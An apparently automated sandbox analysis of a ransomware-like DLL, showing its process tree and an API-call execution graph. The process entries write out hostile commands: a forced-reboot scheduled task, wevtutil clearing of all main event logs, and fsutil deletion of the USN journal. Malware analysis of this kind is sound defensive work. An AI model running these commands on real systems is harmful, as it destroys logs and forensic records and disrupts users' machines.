Jul 12, 2017 22:07:27.042435884 MESZ4926980192.168.1.16192.168.1.2
Jul 12, 2017 22:07:27.042479992 MESZ8049269192.168.1.2192.168.1.16
Jul 12, 2017 22:07:27.538759947 MESZ4926980192.168.1.16192.168.1.2
Jul 12, 2017 22:07:27.538794994 MESZ8049269192.168.1.2192.168.1.16
Jul 12, 2017 22:07:28.053831100 MESZ4926980192.168.1.16192.168.1.2
Jul 12, 2017 22:07:28.053863049 MESZ8049269192.168.1.2192.168.1.16

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 2716 Parent PID: 2348

General

Start time:22:08:08
Start date:12/07/2017
Path:C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):false
Commandline:loaddll32.exe 'C:\Users\user\Desktop\abc.dll'
Imagebase:0x2b0000
File size:112640 bytes
MD5 hash:D2792A55032CFE825F07DCD4BEC5F40F
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 2724 Parent PID: 2716

General

Start time:22:08:08
Start date:12/07/2017
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:rundll32.exe C:\Users\user\Desktop\abc.dll,#1
Imagebase:0xf0000
File size:44544 bytes
MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 2768 Parent PID: 2724

General

Start time:22:08:08
Start date:12/07/2017
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:/c schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11
Imagebase:0x49e20000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: F915.tmp PID: 2800 Parent PID: 2724

General

Start time:22:08:09
Start date:12/07/2017
Path:C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp
Wow64 process (32bit):false
Commandline:'C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp' \\.\pipe\{5F8C413D-F226-48C7-A40D-408B0F9CF420}
Imagebase:0xf60000
File size:47616 bytes
MD5 hash:2813D34F6197EB4DF42C886EC7F234A1
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: schtasks.exe PID: 2824 Parent PID: 2768

General

Start time:22:08:09
Start date:12/07/2017
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11
Imagebase:0x76e20000
File size:179712 bytes
MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 2868 Parent PID: 2724

General

Start time:22:08:11
Start date:12/07/2017
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Imagebase:0x49f60000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: wevtutil.exe PID: 2888 Parent PID: 2868

General

Start time:22:08:12
Start date:12/07/2017
Path:C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):false
Commandline:wevtutil cl Setup
Imagebase:0xda0000
File size:175616 bytes
MD5 hash:81538B795F922B8DA6FD897EFB04B5EE
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: wevtutil.exe PID: 2948 Parent PID: 2868

General

Start time:22:08:13
Start date:12/07/2017
Path:C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):false
Commandline:wevtutil cl System
Imagebase:0xb10000
File size:175616 bytes
MD5 hash:81538B795F922B8DA6FD897EFB04B5EE
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: wevtutil.exe PID: 2960 Parent PID: 2868

General

Start time:22:08:13
Start date:12/07/2017
Path:C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):false
Commandline:wevtutil cl Security
Imagebase:0x7a0000
File size:175616 bytes
MD5 hash:81538B795F922B8DA6FD897EFB04B5EE
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: wevtutil.exe PID: 2972 Parent PID: 2868

General

Start time:22:08:13
Start date:12/07/2017
Path:C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):false
Commandline:wevtutil cl Application
Imagebase:0x8f0000
File size:175616 bytes
MD5 hash:81538B795F922B8DA6FD897EFB04B5EE
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: fsutil.exe PID: 2988 Parent PID: 2868

General

Start time:22:08:14
Start date:12/07/2017
Path:C:\Windows\System32\fsutil.exe
Wow64 process (32bit):false
Commandline:fsutil usn deletejournal /D C:
Imagebase:0xe20000
File size:74240 bytes
MD5 hash:B4834F08230A2EB7F498DE4E5B6AB814
Programmed in:C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

    Analysis Process: rundll32.exe PID: 2724 Parent PID: 2716

    Execution Graph

    Execution Coverage:24.6%
    Dynamic/Decrypted Code Coverage:100%
    Signature Coverage:15.7%
    Total number of Nodes:1687
    Total number of Limit Nodes:18

    Graph

    %3 7701 11eaa74 7705 11ea64e 7701->7705 7702 11eb8df 7703 11ebc5b 3 API calls 7702->7703 7704 11eac60 7702->7704 7703->7704 7705->7702 7705->7704 7706 11eaa1f memcpy 7705->7706 7706->7705 7733 11e6c74 StrCmpIW 7734 11e6c90 StrCmpW 7733->7734 7735 11e6ca0 7733->7735 7734->7735 7736 11e6eda 7737 11e6ee3 7736->7737 7739 11e6efc 7736->7739 7738 11e6ee9 StrCmpIW 7737->7738 7737->7739 7738->7739 5766 11e94a5 FreeLibrary 5767 11e94c7 CreateFileW 5766->5767 5768 11e958b 5766->5768 5769 11e94f2 GetFileSize CloseHandle CreateFileW 5767->5769 5770 11e955e DeleteFileW 5767->5770 5769->5770 5772 11e951b GetProcessHeap RtlAllocateHeap 5769->5772 5778 11e9367 5770->5778 5773 11e9536 WriteFile GetProcessHeap HeapFree 5772->5773 5774 11e9555 CloseHandle 5772->5774 5773->5774 5774->5770 5775 11e9584 ExitProcess 5779 11e9497 5778->5779 5781 11e938b VirtualProtect 5778->5781 5779->5775 5787 11e7deb 5779->5787 5781->5779 5786 11e93ef 5781->5786 5782 11e947a VirtualProtect 5782->5779 5783 11e9401 LoadLibraryA 5783->5786 5784 11e9474 5784->5779 5784->5782 5785 11e944b GetProcAddress 5785->5786 5786->5782 5786->5783 5786->5784 5786->5785 5788 11e7df8 5787->5788 5858 11e7cc0 5788->5858 5790 11e7e00 5791 11e7e06 5790->5791 5792 11e7e14 WSAStartup 5790->5792 5996 11e9590 5791->5996 5879 11e7091 GetProcessHeap HeapAlloc 5792->5879 5796 11e7091 13 API calls 5797 11e7e53 InitializeCriticalSection 5796->5797 5885 11e6a2b 5797->5885 5800 11e7e84 5918 11e84df GetLocalTime 5800->5918 5806 11e7eb2 5956 11e70fa 5806->5956 5808 11e7ea4 5808->5806 5928 11e7545 5808->5928 5810 11e7ebd 5811 11e7ed4 5810->5811 5959 11e8999 FindResourceW 5810->5959 5813 11e7ee1 5811->5813 5814 11e7ff1 5811->5814 5816 11e7091 13 API calls 5813->5816 5815 11e70fa 3 API calls 5814->5815 5817 11e7ffc CreateThread 5815->5817 5818 11e7ef3 5816->5818 5976 11e8282 5817->5976 7366 11ea0fe 5817->7366 6007 11e875a 5818->6007 5822 11e8043 CreateThread 5823 11e806b Sleep 5822->5823 5825 11e805e GetProcessHeap HeapFree 5822->5825 7396 11ea274 Sleep 5822->7396 5826 11e808b Sleep 5823->5826 5827 11e8086 5823->5827 5824 11e7f15 CreateThread 5828 11e7f34 SetThreadToken 5824->5828 5842 11e7f04 5824->5842 7405 11e9f8e GetCurrentThread OpenThreadToken 5824->7405 5825->5823 5830 11e811b Sleep 5826->5830 5831 11e80a0 memset GetVersionExW 5826->5831 5982 11e1eef GetLogicalDrives 5827->5982 5832 11e7f55 GetLastError 5828->5832 5833 11e7f45 ResumeThread 5828->5833 5838 11e8141 5830->5838 5831->5830 5843 11e80cd 5831->5843 5836 11e7f5e CloseHandle 5832->5836 5834 11e7f70 SetLastError CreateThread 5833->5834 5835 11e7f53 5833->5835 5837 11e7f98 SetThreadToken 5834->5837 5834->5842 7428 11e7d58 5834->7428 5835->5836 5836->5834 5839 11e7fca CloseHandle 5837->5839 5840 11e7fa9 ResumeThread 5837->5840 5988 11e83bd 5838->5988 5839->5842 5845 11e7fb7 WaitForSingleObject 5840->5845 5846 11e7fc4 GetLastError 5840->5846 5842->5814 5842->5824 5842->5834 6026 11e7298 5842->6026 5843->5830 6041 11e6bb0 5843->6041 5845->5839 5846->5839 5849 11e8104 6051 11e7d6f 5849->6051 5850 11e8163 GetModuleHandleA 5853 11e8172 GetProcAddress 5850->5853 5854 11e8192 InitiateSystemShutdownExW 5850->5854 5851 11e8114 ExitProcess 5853->5854 5856 11e8182 NtRaiseHardError 5853->5856 5854->5851 5855 11e81ac ExitWindowsEx 5854->5855 5855->5851 5856->5854 5859 11e7ccb GetTickCount 5858->5859 5860 11e7d37 5858->5860 6060 11e81ba GetCurrentProcess OpenProcessToken 5859->6060 5860->5790 5862 11e7ce0 5863 11e81ba 6 API calls 5862->5863 5864 11e7cef 5863->5864 5865 11e81ba 6 API calls 5864->5865 5866 11e7d00 5865->5866 6065 11e8677 CreateToolhelp32Snapshot 5866->6065 5869 11e7d31 CreateFileW 5871 11e8afa GetFileSize 5869->5871 5872 11e8b6a 5869->5872 5873 11e8b60 CloseHandle 5871->5873 5874 11e8b09 GetProcessHeap HeapAlloc 5871->5874 5872->5790 5873->5872 5875 11e8b1f ReadFile 5874->5875 5877 11e8b4c 5874->5877 5876 11e8b36 5875->5876 5875->5877 5876->5877 5878 11e8b3b GetProcessHeap HeapFree 5876->5878 5877->5873 5878->5877 5880 11e70b2 InitializeCriticalSection GetProcessHeap HeapAlloc 5879->5880 5881 11e70f1 5879->5881 5880->5881 5882 11e70ea 5880->5882 5881->5796 6072 11e7003 5882->6072 5886 11e6ad5 5885->5886 5887 11e6a3b 5885->5887 5886->5800 5900 11e835e 5886->5900 5887->5886 5887->5887 5888 11e6a56 CommandLineToArgvW 5887->5888 5888->5886 5889 11e6a6d 5888->5889 5890 11e6a72 StrToIntW 5889->5890 5891 11e6ace LocalFree 5889->5891 5892 11e6a82 5890->5892 5891->5886 5893 11e6a8c StrStrW 5892->5893 5894 11e6ac3 5892->5894 5895 11e6ac5 5893->5895 5896 11e6a9f StrChrW 5893->5896 5894->5891 6093 11e69a2 5895->6093 5896->5892 5897 11e6aac 5896->5897 6079 11e6de0 5897->6079 6107 11e8320 PathFindFileNameW PathCombineW 5900->6107 5903 11e7e7f 5907 11e8d5a CreateFileA 5903->5907 5904 11e837a PathFileExistsW 5905 11e838c CreateFileW 5904->5905 5906 11e83b6 ExitProcess 5904->5906 5905->5903 5908 11e8d85 DeviceIoControl 5907->5908 5910 11e8de6 5907->5910 5911 11e8da4 LocalAlloc 5908->5911 5912 11e8ddf CloseHandle 5908->5912 5909 11e8df8 6140 11e8cbf CreateFileA 5909->6140 5910->5909 6110 11e14a9 7 API calls 5910->6110 5911->5912 5915 11e8db9 SetFilePointer WriteFile LocalFree 5911->5915 5912->5910 5915->5912 5916 11e8dfd 5916->5800 6193 11e6973 GetTickCount 5918->6193 5921 11e84fc GetSystemDirectoryW 5922 11e8541 PathAppendW 5921->5922 5923 11e7e89 CreateThread 5921->5923 5922->5923 5924 11e8557 5922->5924 5923->5806 5923->5808 7383 11e7c10 5923->7383 6194 11e8494 memset GetVersionExW 5924->6194 5927 11e83bd 5 API calls 5927->5923 6196 11ea4f0 5928->6196 5931 11e7589 FindResourceW 5933 11e75a5 5931->5933 5935 11e75b2 5931->5935 5932 11e7582 IsWow64Process 5932->5931 6198 11e85d0 LoadResource 5933->6198 5936 11e7777 5935->5936 5937 11e75c0 GetTempPathW 5935->5937 5936->5806 5938 11e75da GetTempFileNameW 5937->5938 5942 11e7755 GetProcessHeap HeapFree 5937->5942 5939 11e75f8 CoCreateGuid 5938->5939 5938->5942 5941 11e7616 StringFromCLSID 5939->5941 5939->5942 5941->5942 5943 11e762f 5941->5943 5942->5936 6207 11e73ae CreateFileW 5943->6207 5946 11e774a CoTaskMemFree 5946->5942 5947 11e7649 wsprintfW CreateThread 5948 11e7686 memset wsprintfW CreateProcessW 5947->5948 5951 11e771b 5947->5951 6237 11e73fd GetProcessHeap HeapAlloc 5947->6237 5949 11e76ef WaitForSingleObject 5948->5949 5950 11e7712 CloseHandle 5948->5950 5952 11e70fa 3 API calls 5949->5952 5950->5951 5951->5951 5953 11e73ae 3 API calls 5951->5953 5954 11e7708 TerminateThread 5952->5954 5955 11e773d DeleteFileW 5953->5955 5954->5950 5955->5946 5957 11e711c 5956->5957 5958 11e70fe EnterCriticalSection InterlockedExchange LeaveCriticalSection 5956->5958 5957->5810 5958->5810 5960 11e89c3 5959->5960 5964 11e89d0 5959->5964 5961 11e85d0 12 API calls 5960->5961 5961->5964 5962 11e8abd SetLastError 5962->5811 5963 11e89dc GetProcessHeap HeapAlloc 5965 11e8a12 SHGetFolderPathW 5963->5965 5966 11e8a08 GetWindowsDirectoryW 5963->5966 5964->5962 5964->5963 5967 11e8a59 GetProcessHeap HeapFree 5965->5967 5968 11e8a24 5965->5968 5966->5968 5969 11e8a6d 5967->5969 5968->5967 5971 11e8a46 PathAppendW 5968->5971 5970 11e8a96 GetProcessHeap HeapFree 5969->5970 6254 11e8946 CreateFileW 5969->6254 5970->5962 5971->5969 5975 11e8a88 GetLastError 5975->5970 6259 11e6973 GetTickCount 5976->6259 5978 11e828e NetServerGetInfo 5979 11e82b5 5978->5979 5980 11e82c0 NetApiBufferFree 5979->5980 5981 11e8029 GetProcessHeap HeapAlloc 5979->5981 5980->5981 5981->5822 5981->5823 5983 11e1f04 5982->5983 5984 11e1f0f GetDriveTypeW 5983->5984 5985 11e1f6f 5983->5985 5984->5983 5986 11e1f39 LocalAlloc 5984->5986 5985->5826 5986->5983 5987 11e1f47 CreateThread 5986->5987 5987->5983 6260 11e1e51 CryptAcquireContextW 5987->6260 5989 11e83e2 GetEnvironmentVariableW 5988->5989 5990 11e840a GetSystemDirectoryW 5989->5990 5993 11e8432 CreateProcessW 5989->5993 5991 11e841c lstrcatW 5990->5991 5992 11e815a 5990->5992 5991->5992 5991->5993 5992->5850 5992->5851 5993->5992 5995 11e847b Sleep 5993->5995 5995->5992 5997 11e95a3 5996->5997 5999 11e967a 5996->5999 5998 11e95af VirtualAlloc 5997->5998 5997->5999 5998->5999 6000 11e95dc memcpy 5998->6000 5999->5792 6001 11e9649 VirtualProtect 6000->6001 6004 11e95fa 6000->6004 6001->5999 6003 11e965e 6001->6003 6002 11e966d VirtualFree 6002->5999 6003->6002 6003->6003 6004->6001 6340 11e9286 VirtualProtect 6004->6340 6008 11ea4f0 6007->6008 6009 11e876a memset 6008->6009 6010 11e8494 2 API calls 6009->6010 6011 11e879d CreateToolhelp32Snapshot 6010->6011 6012 11e87b7 Process32FirstW 6011->6012 6013 11e8939 6011->6013 6014 11e8929 GetLastError 6012->6014 6024 11e87d3 6012->6024 6013->5842 6016 11e892f CloseHandle 6014->6016 6015 11e87e8 OpenProcess 6017 11e8811 OpenProcessToken 6015->6017 6015->6024 6016->6013 6018 11e8826 GetTokenInformation 6017->6018 6019 11e88f7 CloseHandle CloseHandle 6017->6019 6018->6019 6018->6024 6019->6024 6020 11e8910 Process32NextW 6020->6015 6021 11e8927 6020->6021 6021->6016 6022 11e8858 DuplicateTokenEx 6022->6019 6023 11e8875 memset GetTokenInformation 6022->6023 6023->6019 6023->6024 6024->6015 6024->6016 6024->6019 6024->6020 6024->6022 6025 11e88b9 SetTokenInformation 6024->6025 6025->6019 6025->6024 6027 11e73a5 6026->6027 6028 11e72ae 6026->6028 6027->5842 6028->6027 6029 11e72b7 EnterCriticalSection 6028->6029 6344 11e71d6 6029->6344 6032 11e739d LeaveCriticalSection 6032->6027 6033 11e72e0 GetProcessHeap HeapAlloc 6033->6032 6035 11e7306 GetProcessHeap HeapAlloc 6033->6035 6034 11e7363 GetProcessHeap HeapReAlloc 6034->6032 6036 11e7384 6034->6036 6037 11e7353 GetProcessHeap HeapFree 6035->6037 6038 11e7325 memcpy 6035->6038 6039 11e7298 2 API calls 6036->6039 6037->6032 6038->6032 6040 11e739a 6039->6040 6040->6032 6349 11e6973 GetTickCount 6041->6349 6043 11e6bbe 6043->6043 6044 11e6bf0 EnterCriticalSection 6043->6044 6045 11e6c0d 6044->6045 6047 11e6c12 6044->6047 6350 11e6af0 6045->6350 6048 11e6c36 StrCatW StrCatW 6047->6048 6049 11e6c58 SetLastError 6047->6049 6050 11e6c60 LeaveCriticalSection 6048->6050 6049->6050 6050->5849 6052 11e7d83 6051->6052 6059 11e7dde 6051->6059 6052->6059 6369 11e96c7 6052->6369 6055 11e7db2 Sleep 6056 11e8320 3 API calls 6055->6056 6057 11e7dc9 6056->6057 6058 11e7dcd PathFileExistsW 6057->6058 6057->6059 6058->6059 6059->5830 6059->5851 6061 11e8231 SetLastError 6060->6061 6062 11e81ef LookupPrivilegeValueW 6060->6062 6061->5862 6062->6061 6063 11e8201 AdjustTokenPrivileges GetLastError 6062->6063 6063->6061 6064 11e822f 6063->6064 6064->6061 6066 11e869a Process32FirstW 6065->6066 6067 11e7d12 GetModuleFileNameW 6065->6067 6068 11e874c CloseHandle 6066->6068 6069 11e86bc Process32NextW 6066->6069 6067->5860 6067->5869 6068->6067 6071 11e8749 6069->6071 6071->6068 6073 11e708f 6072->6073 6076 11e700f 6072->6076 6073->5881 6074 11e7085 GetProcessHeap HeapFree 6074->6073 6075 11e707b GetProcessHeap HeapFree 6075->6074 6076->6074 6076->6075 6077 11e7060 GetProcessHeap HeapFree 6076->6077 6078 11e704e GetProcessHeap HeapFree 6076->6078 6077->6076 6078->6077 6080 11e6df9 6079->6080 6080->6080 6081 11e6e04 GetProcessHeap HeapAlloc 6080->6081 6082 11e6ed0 6081->6082 6083 11e6e2b 6081->6083 6082->5892 6083->6083 6084 11e6e3c memcpy 6083->6084 6085 11e6e59 6084->6085 6085->6085 6086 11e6e64 GetProcessHeap HeapAlloc 6085->6086 6087 11e6ec6 GetProcessHeap HeapFree 6086->6087 6088 11e6e81 6086->6088 6087->6082 6088->6088 6089 11e6e92 memcpy 6088->6089 6090 11e7298 13 API calls 6089->6090 6091 11e6eb6 6090->6091 6091->6082 6092 11e6ebd GetProcessHeap HeapFree 6091->6092 6092->6087 6094 11e69d0 CommandLineToArgvW 6093->6094 6095 11e69bc 6093->6095 6096 11e69e4 6094->6096 6097 11e6a24 6094->6097 6095->6094 6098 11e6a1d LocalFree 6096->6098 6099 11e6a1c 6096->6099 6101 11e6fc7 6096->6101 6097->5894 6098->6097 6099->6098 6102 11e6ffd 6101->6102 6103 11e6fd1 6101->6103 6102->6096 6103->6102 6103->6103 6104 11e6fee 6103->6104 6105 11e7298 13 API calls 6104->6105 6106 11e6ffb 6105->6106 6106->6102 6108 11e8351 6107->6108 6109 11e8344 PathFindExtensionW 6107->6109 6108->5903 6108->5904 6109->6108 6145 11e1038 memset memset 6110->6145 6115 11e15a2 6115->5909 6115->5916 6120 11e1661 memset 6121 11e1424 5 API calls 6120->6121 6122 11e168d 6121->6122 6122->6115 6123 11e1424 5 API calls 6122->6123 6124 11e16a8 6123->6124 6124->6115 6125 11e16b5 memcpy 6124->6125 6126 11e16d8 6125->6126 6126->6126 6127 11e16f0 memcpy 6126->6127 6128 11e170c 6126->6128 6127->6128 6128->6115 6129 11e1758 memcpy 6128->6129 6130 11e1751 6128->6130 6129->6130 6130->6115 6131 11e17e7 memcpy 6130->6131 6134 11e1808 6131->6134 6136 11e182c 6131->6136 6133 11e1384 6 API calls 6135 11e1852 6133->6135 6134->6136 6184 11e1384 6134->6184 6135->6115 6137 11e1384 6 API calls 6135->6137 6136->6115 6136->6133 6138 11e1871 6137->6138 6138->6115 6139 11e1384 6 API calls 6138->6139 6139->6115 6141 11e8ce7 6140->6141 6142 11e8ceb DeviceIoControl LocalAlloc 6140->6142 6141->5916 6143 11e8d4b CloseHandle 6142->6143 6144 11e8d1b DeviceIoControl WriteFile LocalFree 6142->6144 6143->6141 6144->6143 6146 11e10b0 memset GetSystemDirectoryA 6145->6146 6149 11e10fb 6145->6149 6147 11e110a CreateFileA 6146->6147 6148 11e10ed GetLastError 6146->6148 6147->6148 6150 11e112d DeviceIoControl 6147->6150 6148->6149 6149->6115 6159 11e122d 6149->6159 6151 11e114a GetLastError 6150->6151 6152 11e1166 _itoa 6150->6152 6153 11e1154 6151->6153 6156 11e1180 6152->6156 6154 11e1213 CloseHandle 6153->6154 6154->6149 6155 11e11c2 memcpy 6157 11e11de 6155->6157 6156->6153 6156->6155 6156->6157 6157->6154 6157->6157 6158 11e11fe memcpy 6157->6158 6158->6154 6160 11e124c CreateFileA 6159->6160 6164 11e1242 6159->6164 6161 11e1280 DeviceIoControl 6160->6161 6162 11e1268 GetLastError 6160->6162 6163 11e12a3 GetLastError 6161->6163 6166 11e12ad CloseHandle 6161->6166 6162->6164 6163->6166 6164->6115 6167 11e1424 CryptAcquireContextA 6164->6167 6166->6164 6168 11e1457 GetLastError 6167->6168 6169 11e146a CryptGenRandom 6167->6169 6172 11e145d 6168->6172 6170 11e1483 6169->6170 6171 11e147d GetLastError 6169->6171 6173 11e1495 CryptReleaseContext 6170->6173 6174 11e14a0 6170->6174 6171->6170 6172->6169 6172->6170 6173->6174 6174->6115 6175 11e12d5 6174->6175 6176 11e12f1 memset CreateFileA 6175->6176 6177 11e12e7 6175->6177 6178 11e131f GetLastError 6176->6178 6179 11e1337 SetFilePointerEx 6176->6179 6177->6115 6177->6120 6178->6177 6180 11e135e GetLastError 6179->6180 6181 11e134a ReadFile 6179->6181 6183 11e1368 6180->6183 6181->6180 6182 11e1374 CloseHandle 6181->6182 6182->6177 6183->6182 6185 11e139e CreateFileA 6184->6185 6190 11e1397 6184->6190 6186 11e13d2 SetFilePointerEx 6185->6186 6187 11e13ba GetLastError 6185->6187 6188 11e13e6 WriteFile 6186->6188 6189 11e13fe GetLastError 6186->6189 6187->6190 6188->6189 6191 11e1414 CloseHandle 6188->6191 6192 11e1408 6189->6192 6190->6134 6191->6190 6192->6191 6193->5921 6195 11e84d0 6194->6195 6195->5927 6197 11e7552 GetCurrentProcess GetModuleHandleW GetProcAddress 6196->6197 6197->5931 6197->5932 6199 11e85f0 LockResource 6198->6199 6200 11e864c 6198->6200 6199->6200 6201 11e85fe SizeofResource 6199->6201 6200->5935 6201->6200 6202 11e8614 GetProcessHeap RtlAllocateHeap 6201->6202 6202->6200 6203 11e862e 6202->6203 6212 11ea520 6203->6212 6205 11e8648 6205->6200 6206 11e8661 GetProcessHeap HeapFree 6205->6206 6206->6200 6208 11e73d1 WriteFile 6207->6208 6209 11e73f5 6207->6209 6210 11e73ee CloseHandle 6208->6210 6211 11e73e8 6208->6211 6209->5946 6209->5947 6210->6209 6211->6210 6217 11ebb31 6212->6217 6215 11ea569 6215->6205 6226 11ebaa4 6217->6226 6219 11ea559 6219->6215 6220 11ea5cc 6219->6220 6221 11eac60 6220->6221 6222 11ea5e0 6220->6222 6221->6215 6222->6221 6223 11eb8df 6222->6223 6224 11eaa1f memcpy 6222->6224 6223->6221 6231 11ebc5b 6223->6231 6224->6222 6227 11ebab1 6226->6227 6228 11ebac3 6226->6228 6227->6228 6230 11ec223 malloc 6227->6230 6228->6219 6230->6228 6232 11ebc71 6231->6232 6233 11ebcb1 memcpy 6232->6233 6234 11ebcc9 memcpy 6232->6234 6236 11ebc8a 6232->6236 6233->6236 6235 11ebce8 memcpy 6234->6235 6234->6236 6235->6236 6236->6221 6238 11e7438 InitializeSecurityDescriptor 6237->6238 6239 11e753c 6237->6239 6238->6239 6240 11e7449 SetSecurityDescriptorDacl 6238->6240 6240->6239 6241 11e745e CreateNamedPipeW 6240->6241 6241->6241 6242 11e747c ConnectNamedPipe 6241->6242 6243 11e752e CloseHandle 6242->6243 6245 11e748c 6242->6245 6243->6241 6244 11e748f PeekNamedPipe 6244->6245 6245->6244 6246 11e74ad Sleep 6245->6246 6247 11e74be GetProcessHeap HeapAlloc 6245->6247 6249 11e751c FlushFileBuffers DisconnectNamedPipe 6245->6249 6246->6245 6248 11e74d2 ReadFile 6247->6248 6247->6249 6250 11e7511 GetProcessHeap HeapFree 6248->6250 6252 11e74eb 6248->6252 6249->6243 6250->6249 6251 11e74f3 StrChrW 6251->6250 6251->6252 6252->6250 6252->6251 6253 11e6de0 23 API calls 6252->6253 6253->6250 6255 11e8970 WriteFile 6254->6255 6256 11e8991 6254->6256 6257 11e898a CloseHandle 6255->6257 6258 11e8984 6255->6258 6256->5970 6256->5975 6257->6256 6258->6257 6259->5978 6261 11e1ea9 6260->6261 6262 11e1e7a GetLastError 6260->6262 6274 11e1b4e CryptGenKey 6261->6274 6266 11e1e87 6262->6266 6264 11e1e9a CryptAcquireContextW 6264->6261 6265 11e1edc 6264->6265 6267 11e1edf LocalFree 6265->6267 6266->6264 6266->6265 6268 11e1ecf CryptReleaseContext 6268->6267 6275 11e1b99 6274->6275 6276 11e1b73 CryptSetKeyParam CryptSetKeyParam 6274->6276 6275->6268 6277 11e1973 6275->6277 6276->6275 6278 11e1b46 6277->6278 6279 11e198b PathCombineW 6277->6279 6291 11e1d32 6278->6291 6279->6278 6280 11e19a9 FindFirstFileW 6279->6280 6280->6278 6283 11e19c9 6280->6283 6281 11e19d9 WaitForSingleObject 6282 11e1b3c FindClose 6281->6282 6281->6283 6282->6278 6283->6281 6283->6282 6284 11e1b25 FindNextFileW 6283->6284 6285 11e1a6b PathCombineW 6283->6285 6286 11e1ac2 PathFindExtensionW 6283->6286 6287 11e1a9a StrStrIW 6283->6287 6288 11e1973 9 API calls 6283->6288 6289 11e1aff StrStrIW 6283->6289 6308 11e189a CreateFileW 6283->6308 6284->6282 6284->6283 6285->6283 6285->6284 6286->6283 6287->6283 6287->6284 6288->6283 6289->6283 6289->6284 6319 11e1ba0 CryptStringToBinaryW 6291->6319 6296 11e1d61 PathCombineW 6298 11e1e40 LocalFree 6296->6298 6299 11e1d7e 6296->6299 6297 11e1e4c CryptDestroyKey 6297->6268 6298->6297 6339 11e6973 GetTickCount 6299->6339 6301 11e1d83 6302 11e1d87 Sleep 6301->6302 6303 11e1d95 CreateFileW 6301->6303 6302->6303 6304 11e1db9 WriteFile WriteFile WriteFile WriteFile WriteFile 6303->6304 6305 11e1e3f 6303->6305 6306 11e1e1a 6304->6306 6305->6298 6306->6306 6307 11e1e25 WriteFile CloseHandle 6306->6307 6307->6305 6309 11e18c7 GetFileSizeEx 6308->6309 6310 11e1951 6308->6310 6312 11e18da CreateFileMappingW 6309->6312 6310->6284 6313 11e1948 CloseHandle 6312->6313 6314 11e18ff MapViewOfFile 6312->6314 6313->6310 6315 11e193f CloseHandle 6314->6315 6316 11e1913 CryptEncrypt 6314->6316 6315->6313 6317 11e192e FlushViewOfFile 6316->6317 6318 11e1938 UnmapViewOfFile 6316->6318 6317->6318 6318->6315 6320 11e1bd0 LocalAlloc 6319->6320 6321 11e1c75 6319->6321 6320->6321 6322 11e1be9 CryptStringToBinaryW 6320->6322 6321->6297 6329 11e1c7f CryptExportKey 6321->6329 6323 11e1bfe CryptDecodeObjectEx 6322->6323 6324 11e1c6c LocalFree 6322->6324 6323->6324 6325 11e1c20 LocalAlloc 6323->6325 6324->6321 6325->6324 6326 11e1c32 CryptDecodeObjectEx 6325->6326 6327 11e1c63 LocalFree 6326->6327 6328 11e1c48 CryptImportKey 6326->6328 6327->6324 6328->6327 6330 11e1cac LocalAlloc 6329->6330 6331 11e1d2a 6329->6331 6330->6331 6332 11e1cbe CryptExportKey 6330->6332 6331->6296 6331->6297 6333 11e1d21 LocalFree 6332->6333 6334 11e1cd2 CryptBinaryToStringW 6332->6334 6333->6331 6334->6333 6335 11e1cee LocalAlloc 6334->6335 6335->6333 6336 11e1d02 CryptBinaryToStringW 6335->6336 6337 11e1d15 6336->6337 6338 11e1d1a LocalFree 6336->6338 6337->6333 6338->6333 6339->6301 6341 11e92a9 6340->6341 6342 11e9319 6340->6342 6341->6342 6343 11e92f2 VirtualProtect 6341->6343 6342->6001 6343->6341 6345 11e71e5 EnterCriticalSection 6344->6345 6346 11e7245 6344->6346 6347 11e723d LeaveCriticalSection 6345->6347 6348 11e71f8 6345->6348 6346->6032 6346->6033 6346->6034 6347->6346 6348->6347 6349->6043 6357 11e711f GetProcessHeap HeapAlloc 6350->6357 6352 11e6b9d 6352->6047 6353 11e6b1a 6353->6352 6354 11e6b62 StrCatW 6353->6354 6355 11e6b8d GetProcessHeap HeapFree 6353->6355 6363 11e7167 6354->6363 6355->6352 6358 11e715f 6357->6358 6359 11e713d 6357->6359 6358->6353 6360 11e7167 3 API calls 6359->6360 6361 11e714e 6360->6361 6361->6358 6362 11e7152 GetProcessHeap HeapFree 6361->6362 6362->6358 6364 11e7170 6363->6364 6367 11e71d1 6363->6367 6365 11e7175 EnterCriticalSection 6364->6365 6366 11e71b0 LeaveCriticalSection 6364->6366 6364->6367 6368 11e71c4 Sleep 6364->6368 6365->6364 6366->6364 6366->6367 6367->6353 6368->6365 6370 11e96ef PathFindFileNameW 6369->6370 6371 11e7dae 6369->6371 6370->6371 6372 11e9702 6370->6372 6371->6055 6371->6059 6372->6372 6373 11e9719 WideCharToMultiByte inet_addr 